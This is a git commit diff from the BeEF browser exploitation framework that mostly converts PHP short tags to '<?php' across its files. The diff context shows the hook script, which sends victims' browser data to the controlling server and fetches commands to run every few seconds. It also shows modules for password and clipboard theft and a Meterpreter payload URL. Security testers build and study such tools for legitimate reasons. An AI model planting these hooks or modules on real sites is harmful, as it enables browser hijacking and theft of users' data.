<? changed to <php and some minor changes

git-svn-id: https://beef.googlecode.com/svn/trunk@21 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9

CHANGELOG

@@ -1,3 +1,6 @@
+Version 0.4.0.3
+All '<?' changed to '<?php'
+
 Version 0.4.0.2
 Firefox password manager theft added
 

VERSION

@@ -1 +1 @@
-0.4.0.2
+0.4.0.3

hook/autorun.js.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 

hook/beefmagic.js.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -25,7 +25,7 @@ if (window.attachEvent)
 else if (window.addEventListener) 
         window.addEventListener('load', beef_onload, 0);
 
-beef_url = "<?= BEEF_DOMAIN; ?>";
+beef_url = "<?php echo BEEF_DOMAIN; ?>";
 
 // ---[ IS_XUL_CHROME
 // determing if we are in chrome (privileged browser zone)
@@ -113,7 +113,7 @@ return_result('screen', sw+ "x" +sh+ " with " +sd+ "-bit colour");
 // send result to beef
 function return_result(action, data) {
 	var img_tmp = new Image();
-	var src = beef_url + '/hook/return.php?BeEFSession=<? echo session_id(); ?>&action=' + action + '&data=' + escape(data);
+	var src = beef_url + '/hook/return.php?BeEFSession=<?php echo session_id(); ?>&action=' + action + '&data=' + escape(data);
 	img_tmp.src = src;
 }
 
@@ -148,7 +148,7 @@ function include(script_filename) {
 // start heartbeat
 setInterval(function () {
 	var date = new Date().getTime();
-	include(beef_url + '/hook/command.php?BeEFSession=<? echo session_id(); ?>&time=' + date);
+	include(beef_url + '/hook/command.php?BeEFSession=<?php echo session_id(); ?>&time=' + date);
 }, 5000);
 
 // run autorun module
@@ -156,6 +156,6 @@ setInterval(function () {
 // our injection may occur before the element is created within the DOM
 setTimeout(function () {
 	var date = new Date().getTime();
-	include(beef_url + '/hook/autorun.js.php?BeEFSession=<? echo session_id(); ?>&time=' + date);
+	include(beef_url + '/hook/autorun.js.php?BeEFSession=<?php echo session_id(); ?>&time=' + date);
 }, 2000);
 

hook/command.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 

hook/example.php

@@ -1,4 +1,4 @@
-<?
+<?php
 	require_once("../include/config.inc.php");
 ?>
 <html>
@@ -10,12 +10,12 @@
 <body>
 	<img src="../images/beef.gif" alt="BeEF"/>BeEF Test Page<br><br>
 
-	<script language='Javascript' src="<?=BEEF_DOMAIN?>hook/beefmagic.js.php"></script>
+	<script language='Javascript' src="<?php echo BEEF_DOMAIN?>hook/beefmagic.js.php"></script>
 	
 	The following code needs to be included in the zombie:<br>
 	<code>
 	&#x3C;script language='Javascript'
-	src="<?=BEEF_DOMAIN?>hook/beefmagic.js.php'&#x3E;&#x3C;/script&#x3E;
+	src="<?php echo BEEF_DOMAIN?>hook/beefmagic.js.php'&#x3E;&#x3C;/script&#x3E;
     </code>
     <br>
     

hook/ipc_bindshell.js.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -8,7 +8,7 @@
 
 onload = beef_onload;
 
-beef_url = "<?= BEEF_DOMAIN; ?>";
+beef_url = "<?php echo BEEF_DOMAIN; ?>";
 
 function beef_onload() {
 	raw_imap_output=document.body.innerHTML;

hook/ipc_imap.js.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -8,7 +8,7 @@
 
 onload = beef_onload;
 
-beef_url = "<?= BEEF_DOMAIN; ?>";
+beef_url = "<?php echo BEEF_DOMAIN; ?>";
 
 function beef_onload() {
 	raw_imap_output=document.body.innerHTML;

hook/return.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 

include/check_install.inc.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -21,4 +21,4 @@
 		exit(0);
 	}
 		
-?>
+?>

include/common.inc.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 

include/filter.inc.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -23,4 +23,4 @@
 		return valid_url($url);
 	}	
 
-?>
+?>

include/globals.inc.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 	

include/hook.inc.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -62,4 +62,4 @@
 
 		return join("\n", $lines);
 	}
-?>
+?>

include/msf_filter.inc.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -131,4 +131,4 @@
 		return $options;
 	}
 	
-?>
+?>

include/ui_module.inc.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -93,4 +93,4 @@
 	}
 
 
-?>
+?>

include/ui_zombie.inc.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 

include/xmlrpc.inc.php

@@ -3715,4 +3715,4 @@ xmlrpc_encode_entitites($this->errstr, $GLOBALS['xmlrpc_internalencoding'], $cha
 		}
 	}
 
-?>
+?>

index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 ?>
@@ -109,7 +109,7 @@
         				<form name="configform">
                 				<div id="module_subsection_header">Connection (IP Address or URL)</div>
 						This is the location that the zombies will connect to (do not include the hook directory). This must match the 'ServerName' value in your http.conf for the modules to work.
-                				<input type="text" name="url" value="<? echo $url; ?>" autocomplete="off"/>
+                				<input type="text" name="url" value="<?php echo $url; ?>" autocomplete="off"/>
                 				BeEF configuration password
                 				<input type="password" name="passwd" value="BeEFConfigPass" autocomplete="off"/>
                 				<input class="button" type="button" value="Apply Config" onClick="javascript:submit_config(configform.url.value, configform.passwd.value)"/>

modules/browser/cve_2006_3730/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -31,7 +31,7 @@ invokes calc.exe if successful
 
 	function get_b64_code_2006_3730() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/browser/cve_2009_0075/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -37,7 +37,7 @@ Note : Tested and Worked On XP SP2  please wait for another version
 
 	function get_b64_code_2009_0075() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		// replace sections of the code with user input
 		b64code = b64replace(b64code, "REGEXP", document.cmd_form.regexp.value);

modules/browser/cve_2009_0137/index.php

@@ -1,4 +1,4 @@
-<?
+<?php
 	// Copyright (c) 2009, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
@@ -20,7 +20,7 @@ http://xs-sniper.com/blog/2009/02/13/stealing-more-files-with-safari/
 <script>
 	function get_b64_code_2009_0137() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/browser/cve_2009_0137/snatchxml.php

@@ -1,4 +1,4 @@
-<?
+<?php
 	// Copyright (c) 2009, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
@@ -6,13 +6,13 @@
 	require_once("../../../include/common.inc.php");
 ?>
 
-beef_url = "<?= BEEF_DOMAIN; ?>";
+beef_url = "<?php echo BEEF_DOMAIN; ?>";
 
 // ---[ RETURN_RESULT
 // send result to beef
 function return_result(action, data) {
 	var img_tmp = new Image();
-	var src = beef_url + '/hook/return.php?BeEFSession=<? echo session_id(); ?>&action=' + action + '&data=' + escape(data);
+	var src = beef_url + '/hook/return.php?BeEFSession=<?php echo session_id(); ?>&action=' + action + '&data=' + escape(data);
 	img_tmp.src = src;
 }
 

modules/browser/dos_chrome/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -39,7 +39,7 @@ Aditya K Sood
 
 	function get_b64_code_cd() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/browser/dos_firefox/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -17,7 +17,7 @@ http://www.milw0rm.com/exploits/8822
 <script>
 	function get_b64_code_fd() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/browser/dos_generic/index.php

@@ -1,6 +1,6 @@
-<?
+<?php
 
-// Copyright (c) 2006-2009, Wade Alcorn 
+// Copyright (c) 2006-2010, Wade Alcorn 
 // All Rights Reserved
 // wade@bindshell.net - http://www.bindshell.net
 
@@ -13,7 +13,7 @@ DEFINE('JS_FILE', './template.js');
 
 	function get_b64_code_request() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		return b64code;
 	}

modules/browser/malicious_applet/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn
 	// All Rights Reserved
 	// Module by: Joshua "Jabra" Abraham http://blog.spl0it.org
 
@@ -10,7 +10,7 @@
 <script>
 	function get_b64_code_applet() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		// do some super escaping 		
 		cmd_str = document.myform.cmd.value;

modules/browser/mozilla_nsiprocess_interface/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -11,7 +11,7 @@
 
 	get_b64_code_alert = function () {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		// replace sections of the code with user input
 		b64code = b64replace(b64code, "BEEFCOMMAND", document.myform.command_str.value);

modules/browser/msf_autopwn/index.php

@@ -1,4 +1,4 @@
-<?
+<?php
 	// Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
 	// All Rights Reserved
 	// Template for code by: 
@@ -20,7 +20,7 @@ BeEF: the following is the boiler plate from the exploit
 	Element.Methods.construct_code = function($url) {
 
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		b64code = b64replace(b64code, "URL",$url);
 
 		// send the code to the zombies

modules/browser/msf_autopwn_manual/index.php

@@ -1,5 +1,5 @@
-<?
-    // Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+    // Copyright (c) 2006-2010, Wade Alcorn 
     // All Rights Reserved
     // wade@bindshell.net - http://www.bindshell.net
     //
@@ -16,7 +16,7 @@
     
     function get_b64_code_request() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		// replace sections of the code with user input
 		b64code = b64replace(b64code, "MSF_IP",document.myform.msf_ip.value);

modules/browser/msf_browser_expliot/index.php

@@ -1,4 +1,4 @@
-<?
+<?php
         // Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
         // All Rights Reserved
         // Template for code by:
@@ -21,7 +21,7 @@ BeEF: the following is the boiler plate from the exploit
 	Element.Methods.construct_code = function($url) {
 
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		b64code = b64replace(b64code, "URL",$url);
 
 		// send the code to the zombies

modules/browser/msf_capture_hashes/index.php

@@ -1,4 +1,4 @@
-<?
+<?php
         // Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
         // All Rights Reserved
         // Template for code by:
@@ -20,7 +20,7 @@ BeEF: the following is the boiler plate from the exploit
 	Element.Methods.construct_code = function($url) {
 
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		b64code = b64replace(b64code, "URL",$url);
 
 		// send the code to the zombies

modules/browser/msf_malicious_java_applet/index.php

@@ -1,5 +1,5 @@
-<?
-    // Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+    // Copyright (c) 2006-2010, Wade Alcorn 
     // All Rights Reserved
     // wade@bindshell.net - http://www.bindshell.net
     //
@@ -14,7 +14,7 @@
 <script>
 	function get_b64_code_msf_applet() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		// do some super escaping 		
 		msfcmd_str = document.myform.msfcmd.value;
@@ -46,7 +46,7 @@ The certificate is self-signed by the Microsoft Corporation.<br><br>
 <div id="module_subsection">
 	<form name="myform">
                 <div id="module_subsection_header">URL to Download Meterpreter Payload</div>
-                <input type="text" name="msfcmd" value="http://<?=$_SERVER['SERVER_NAME']?>/beef/beef.exe"/>
+                <input type="text" name="msfcmd" value="http://<?php echo$_SERVER['SERVER_NAME']?>/beef/beef.exe"/>
 		<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
 		<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
 	</form>

modules/network/asterisk_ipe/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -13,7 +13,7 @@
 	Element.Methods.construct_code = function() {
 
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		// replace sections of the code with user input
 		b64code = b64replace(b64code, "IP_ADDRESS", document.myform.alert_str.value);

modules/network/bindshell_ipc/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -13,7 +13,7 @@
 	Element.Methods.construct_code = function() {
 
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		var temp_cmds = document.myform.cmd_str.value;
 		temp_cmds = temp_cmds.replace(/\n/g, "\\n")

modules/network/browser_redirect/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -11,7 +11,7 @@
 
 	get_b64_code_redirect = function () {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		// replace sections of the code with user input
 		b64code = b64replace(b64code, "REDIRECTURL", document.myform.url_str.value);

modules/network/browser_request/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -12,7 +12,7 @@
 
 	function get_b64_code_request() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		// replace sections of the code with user input
 		b64code = b64replace(b64code, "URL",document.myform.url_string.value);

modules/network/detect_host_ip/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -11,7 +11,7 @@
 
 	get_b64_code_internalip = function () {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		return b64code;
 	}

modules/network/detect_hostname/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -11,7 +11,7 @@
 
 	get_b64_code_internalhostname = function () {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		return b64code;
 	}

modules/network/detect_tor/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -15,7 +15,7 @@
 
 	function get_b64_code_tor_enabled() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/network/detect_visited_urls/index.php

@@ -1,5 +1,5 @@
 <?php
-    // Copyright (c) 2006-2009, Wade Alcorn 
+    // Copyright (c) 2006-2010, Wade Alcorn 
     // All Rights Reserved
     // wade@bindshell.net - http://www.bindshell.net
     //

modules/network/distributed_port_scanner/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -17,7 +17,7 @@
 <script>
 	// show module results section
 	new Element.show('module_results');
-<? 
+<?php
 	// set javascript variables and update modules results section
 	$tmp = md5(getcwd());
 	echo "result_id = '" . $_SESSION[$tmp] . "';\n"; 
@@ -30,7 +30,7 @@
 		var i = 0;
 		var port_pos = 0;
 		
-		var b64code_template = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code_template = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		zl.selected_zombies.each( function(id){ 
 			b64code = b64replace(b64code_template, "TARGET", document.myform.target_.value);

modules/network/imap_ipc/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -13,7 +13,7 @@
 	Element.Methods.construct_code = function() {
 
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		var temp_cmds = document.myform.cmd_str.value;
 		temp_cmds = temp_cmds.replace(/\n/g, "\\\\n")

modules/network/vtiger_crm_upload_exploit/index.php

@@ -1,4 +1,4 @@
-<?
+<?php
 // VtigerCRM <= 5.0.4 "chained exploitation" PoC 
 // Hacked up for OWASP New Zealand Day, July 13th 2009
 //
@@ -25,7 +25,7 @@
 	function get_b64_code_vtiger() {
 
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		// replace sections of the code with user input
 		b64code = b64replace(b64code, "ATTACKURL", document.myform.vtiger_url.value);

modules/standard/alert_dialog/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -11,7 +11,7 @@
 
 	get_b64_code_alert = function () {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		// replace sections of the code with user input
 		b64code = b64replace(b64code, "ALERTSTRING", document.myform.alert_str.value);

modules/standard/clipboard_theft/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -11,7 +11,7 @@
 	
 	function get_b64_code_cb() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/standard/deface_web_page/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -11,7 +11,7 @@
 
 	function get_b64_code_deface() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 
 		// replace sections of the code with user input
 		b64code = b64replace(b64code, "HTMLCONTENT", document.myform.deface_str.value);

modules/standard/detect_flash/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -11,7 +11,7 @@
 
 	function get_b64_code_fe() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/standard/detect_java/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -11,7 +11,7 @@
 	
 	function get_b64_code_je() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/standard/detect_plugins/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -11,7 +11,7 @@
 
 	function get_b64_code_gp() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/standard/detect_quicktime/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -10,7 +10,7 @@
 <script>
 	function get_b64_code() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/standard/detect_software/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
     // All Rights Reserved
     // wade@bindshell.net - http://www.bindshell.net
     //
@@ -17,7 +17,7 @@
 <script>
 	function get_b64_code() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/standard/detect_unsafe_activex/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -10,7 +10,7 @@
 <script>
 	function get_b64_code_ua() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/standard/detect_vbscript/index.php

@@ -1,5 +1,5 @@
-<?
-	// Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
 
@@ -11,7 +11,7 @@
 	
 	function get_b64_code_vbe() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/standard/detect_virtual_machine/index.php

@@ -1,5 +1,5 @@
-<?
-    // Copyright (c) 2006-2009, Wade Alcorn 
+<?php
+    // Copyright (c) 2006-2010, Wade Alcorn 
     // All Rights Reserved
     // wade@bindshell.net - http://www.bindshell.net
     //
@@ -14,7 +14,7 @@
 <script>
 	function get_b64_code_vmdetect2() {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

modules/standard/passwd_theft/index.php

@@ -1,4 +1,4 @@
-<?
+<?php
 	// Copyright (c) 2006-2010, Wade Alcorn 
 	// All Rights Reserved
 	// wade@bindshell.net - http://www.bindshell.net
@@ -25,7 +25,7 @@ Similar technique may work for Internet Explorer, Safari, Chrome, Opera, etc. Yo
 
 	get_b64_code_alert = function () {
 		// javascript is loaded from a file - it could be hard coded
-		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+		var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
 		
 		return b64code;
 	}

